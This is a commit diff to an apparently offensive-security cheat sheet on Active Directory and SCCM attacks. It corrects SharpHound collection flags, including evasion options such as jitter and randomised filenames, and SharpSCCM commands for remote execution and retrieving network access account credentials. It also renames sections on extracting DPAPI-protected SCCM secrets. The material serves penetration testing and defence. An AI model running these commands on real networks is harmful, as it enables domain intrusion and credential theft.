SCCM typos + SharpHound new args
parent
1cee3b6738
commit
581fdf4f18
|
@ -23,7 +23,8 @@ Use the correct collector:
|
||||||
|
|
||||||
.\SharpHound.exe -c all --LdapUsername <UserName> --LdapPassword <Password> --JSONFolder <PathToFile>
|
.\SharpHound.exe -c all --LdapUsername <UserName> --LdapPassword <Password> --JSONFolder <PathToFile>
|
||||||
.\SharpHound.exe -c all --LdapUsername <UserName> --LdapPassword <Password> --domaincontroller 10.10.10.100 -d active.htb
|
.\SharpHound.exe -c all --LdapUsername <UserName> --LdapPassword <Password> --domaincontroller 10.10.10.100 -d active.htb
|
||||||
.\SharpHound.exe -c all,GPOLocalGroup --outputdirectory C:\Windows\Temp --randomizefilenames --prettyjson --nosavecache --encryptzip --collectallproperties --throttle 10000 --jitter 23
|
|
||||||
|
.\SharpHound.exe -c All,GPOLocalGroup --outputdirectory C:\Windows\Temp --prettyprint --randomfilenames --collectallproperties --throttle 10000 --jitter 23 --outputprefix internalallthething
|
||||||
```
|
```
|
||||||
* Use [BloodHoundAD/SharpHound.ps1](https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1) - run the collector on the machine using Powershell
|
* Use [BloodHoundAD/SharpHound.ps1](https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1) - run the collector on the machine using Powershell
|
||||||
```powershell
|
```powershell
|
||||||
|
|
|
@ -10,7 +10,7 @@
|
||||||
|
|
||||||
* Using **SharpSCCM**
|
* Using **SharpSCCM**
|
||||||
```ps1
|
```ps1
|
||||||
.\SharpSCCM.exe get device --server <SERVER8NAME> --site-code <SITE_CODE>
|
.\SharpSCCM.exe get devices --server <SERVER8NAME> --site-code <SITE_CODE>
|
||||||
.\SharpSCCM.exe <server> <sitecode> exec -d <device_name> -r <relay_server_ip>
|
.\SharpSCCM.exe <server> <sitecode> exec -d <device_name> -r <relay_server_ip>
|
||||||
.\SharpSCCM.exe exec -d WS01 -p "C:\Windows\System32\ping 10.10.10.10" -s --debug
|
.\SharpSCCM.exe exec -d WS01 -p "C:\Windows\System32\ping 10.10.10.10" -s --debug
|
||||||
```
|
```
|
||||||
|
@ -81,13 +81,13 @@
|
||||||
|
|
||||||
* [Misconfiguration-Manager - CRED-1](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-1/cred-1_description.md)
|
* [Misconfiguration-Manager - CRED-1](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-1/cred-1_description.md)
|
||||||
|
|
||||||
Requirements:
|
**Requirements**:
|
||||||
|
|
||||||
* On the SCCM Distribution Point: `HKLM\Software\Microsoft\SMS\DP\PxeInstalled` = 1
|
* On the SCCM Distribution Point: `HKLM\Software\Microsoft\SMS\DP\PxeInstalled` = 1
|
||||||
* On the SCCM Distribution Point: `HKLM\Software\Microsoft\SMS\DP\IsPxe` = 1
|
* On the SCCM Distribution Point: `HKLM\Software\Microsoft\SMS\DP\IsPxe` = 1
|
||||||
* PXE-enabled distribution point
|
* PXE-enabled distribution point
|
||||||
|
|
||||||
Exploitation:
|
**Exploitation**:
|
||||||
|
|
||||||
* [csandker/pxethiefy](https://github.com/csandker/pxethiefy)
|
* [csandker/pxethiefy](https://github.com/csandker/pxethiefy)
|
||||||
```ps1
|
```ps1
|
||||||
|
@ -101,12 +101,12 @@ Exploitation:
|
||||||
* [Misconfiguration-Manager - CRED-2](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-2/cred-2_description.md)
|
* [Misconfiguration-Manager - CRED-2](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-2/cred-2_description.md)
|
||||||
|
|
||||||
|
|
||||||
Requirements:
|
**Requirements**:
|
||||||
|
|
||||||
* PKI certificates are not required for client authentication
|
* PKI certificates are not required for client authentication
|
||||||
* Domain accounts credential
|
* Domain accounts credential
|
||||||
|
|
||||||
Exploitation:
|
**Exploitation**:
|
||||||
|
|
||||||
Create a machine or compromise an existing one, then request policies such as `NAAConfig`
|
Create a machine or compromise an existing one, then request policies such as `NAAConfig`
|
||||||
|
|
||||||
|
@ -116,7 +116,7 @@ SharpSCCM get naa
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
### CRED-3 Extract currently deployed credentials stored as DPAPI blobs and decrypt
|
### CRED-3 Extract currently deployed credentials stored as DPAPI blobs
|
||||||
|
|
||||||
> Dump currently deployed secrets via WMI. If you can escalate on a host that is an SCCM client, you can retrieve plaintext domain credentials.
|
> Dump currently deployed secrets via WMI. If you can escalate on a host that is an SCCM client, you can retrieve plaintext domain credentials.
|
||||||
|
|
||||||
|
@ -158,7 +158,7 @@ From a remote machine.
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
### CRED-4 Extract legacy credentials stored as DPAPI blobs and decrypt
|
### CRED-4 Extract legacy credentials stored as DPAPI blobs
|
||||||
|
|
||||||
* [Misconfiguration-Manager - CRED-4](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-4/cred-4_description.md)
|
* [Misconfiguration-Manager - CRED-4](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-4/cred-4_description.md)
|
||||||
|
|
||||||
|
@ -187,7 +187,7 @@ From a remote machine.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
### CRED-5 Extract and decrypt the SC_UserAccount table from the site database
|
### CRED-5 Extract the SC_UserAccount table from the site database
|
||||||
|
|
||||||
* [Misconfiguration-Manager - CRED-5](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-5/cred-5_description.md)
|
* [Misconfiguration-Manager - CRED-5](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-5/cred-5_description.md)
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue